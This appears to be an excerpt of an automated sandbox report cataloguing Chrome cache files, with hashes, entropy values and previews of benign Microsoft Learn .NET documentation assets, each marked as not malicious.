Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33273), with no line terminators
Category:	downloaded
Size (bytes):	33273
Entropy (8bit):	4.918756013698695
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:	86E84C732A96BF9CF18C99B48DB90B6D
SHA1:	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:	AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/toc.json
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 116

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 117

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	4.8007377074457604
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:	0E78F790402498FA57E649052DA01218
SHA1:	9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:	B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:	false
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	downloaded
Size (bytes):	1817143
Entropy (8bit):	5.501007973622959
Encrypted:	false
SSDEEP:	24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:	F57E274AE8E8889C7516D3E53E3EB026
SHA1:	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:	9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/scripts/en-us/index-docs.js
Preview:	"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	47062
Entropy (8bit):	5.016149588804727
Encrypted:	false
SSDEEP:	768:haAq16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTKGLlO6eAbTIr4audZqBkZRLg
MD5:	1FF4CE3C1DB69A5146B03AD8BE62F5EB
SHA1:	5D177F6D11FCFF2BD62E61983383BB39D9F045E4
SHA-256:	222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
SHA-512:	36D198120D83AA9BDC2E74F80B99E2219EE4F03A8DD93A1E58A9E30BD48E829E5220A9F5FE6FC29B3810ED85005A8DCD0EAD04EE06DCCD0A15CD6D080E88641D
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Preview:	<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:HMB:k
MD5:	0B04EA412F8FC88B51398B1CBF38110E
SHA1:	E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
SHA-256:	7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
SHA-512:	6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
Preview:	CgkKBw2/5iXyGgA=

Chrome Cache Entry: 90

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	27868
Entropy (8bit):	5.155680085584642
Encrypted:	false
SSDEEP:	768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
MD5:	0A0F2E1CCB8E5F7C38CB11B101A8941F
SHA1:	112F4B7CB3DEDB9D9744CAC000E05DC949E89891
SHA-256:	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
SHA-512:	9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
Malicious:	false
